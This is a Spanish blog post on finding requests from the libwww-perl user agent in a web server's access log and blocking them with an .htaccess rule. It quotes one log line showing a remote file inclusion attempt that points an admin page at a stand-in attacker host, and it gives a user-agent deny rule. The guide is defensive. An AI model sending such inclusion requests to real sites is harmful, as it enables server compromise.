Libwww es una interfaz en forma de librería que puede ser usada para desarrollar navegadores web, agentes de indexación para buscadores u otro tipo de herramientas. Como todo cliente web, tiene una cabecera de información que le identifica cuando accede a un servidor web.

Algunos hackers utilizan herramientas o scripts automatizados que usan esta librería para perpetrar sus acciones y son identificados con esta cabecera cuando acceden a nuestra web dejando, en muchos casos, huellas de sus intenciones en los registros de acceso. Afortunadamente, tener un acceso identificado como libwww no implica necesariamente un intento de ataque hacker pero conviene estar protegido.



La finalidad de este artículo no es analizar de qué forma los hackers realizan sus intrusiones en un sistema, sino detectar si se están produciendo accesos en nuestro servidor usando esa librería, identificar un posible ataque e intentar bloquear los futuros accesos.

Al tratarse de una librería, es posible encontrarla para diferentes leguajes de programación, entre ellos perl. Muchos servidores web aceptan ejecutar scripts en perl lo que permite que el atacante pueda usar todo el potencial de un servidor web y probablemente, usar el alojamiento de otro usuario para realizar sus ataques sin comprometer su identidad de manera directa. Es decir, el hacker X puede alojar un script perl en el alojamiento web de un usuario Y para atacar un servidor Z. Ni el usuario Y, ni el usuario Z son conscientes de las acciones llevadas a cabo por el hacker X.

En primer lugar, vamos a comprobar si nuestra web permite el acceso de Libwww mediante un test disponible en seositecheckup. Si el resultado de este test te indicó que tu web permite el acceso de libwww-perl es mejor que continúes leyendo para solucionar esto.

libwww-perl no bloqueado
(click en la imagen para ampliar)


Sería buena idea asegurarse de que no hemos tenido accesos a nuestra web con esa librería. Para ello debemos acceder por FTP al log de accesos, generalmente un archivo llamado “access.log” o bien buscar un archivo con el nombre de nuestro dominio dentro del directorio /home/usuario/access-logs. Se trata de un archivo de texto plano que podremos abrir con cualquier editor de textos convencional.

Una vez abierto, buscamos la cadena “libwww-perl” en todo el texto y podremos obtener una línea como la siguiente:

80.122.105.112 - - [07/Oct/2009:12:33:39 +0000] "GET /admin/index.php?var=http://www.hacker.com/include.php HTTP/1.1" 200 43521 "-" "libwww-perl/5.76"


Esto nos indicaría que el atacante ha intentado incluir el archivo include.php dentro de nuestro /admin/index.php, pero la porción de línea que más nos interesa es la que muestra "libwww-perl/5.76" donde revela que se conectó usando la librería libwww-perl.

Los intentos y acciones que el hacker puede realizar son innumerables y difícil de averiguar pero la existencia de libwww-perl sería un indicio de que algo puediera estar ocurriendo.

Como dijimos al principio, libwww-perl es una librería orientada para el desarrollo y programación de herramientas y no tiene por qué ser necesariamente una amenaza pero con la finalidad de protegernos y prevenir, lo mejor sería bloquear los accesos a nuestra web con este user-agent.

Para bloquear los accesos con este Libwww user-agent vamos a hacer uso de .htaccess: un archivo que nos confiere una gran capacidad para configurar ciertos aspectos de nuestro servidor web.

Localiza el archivo .htaccess ubicado en el directorio raíz de tu web y añade las siguientes líneas:

SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots


Guarda el archivo .htaccess y súbelo de nuevo a tu servidor.

Esto hará que se muestre una página de error si se intenta acceder con el user-agent Libwww-perl.

Ahora, sólo queda comprobar si los cambios que hemos realizado surten efecto, para ello vuelve a visitar seositecheckup y observa si en este caso es satisfactorio el test.

mn_bloqueado_libwww-perl
(click en la imagen para ampliar)

Sígueme

Suscríbete

Recibe todas las novedades en tu correo

copyright © bitplanet.es 2024

Todos los derechos reservados salvo contenidos que apliquen su propia licencia

aviso legal | política de privacidad | política sobre cookies

Consola de depuración de Joomla!

Sesión

Información del perfil

Uso de la memoria

Consultas de la base de datos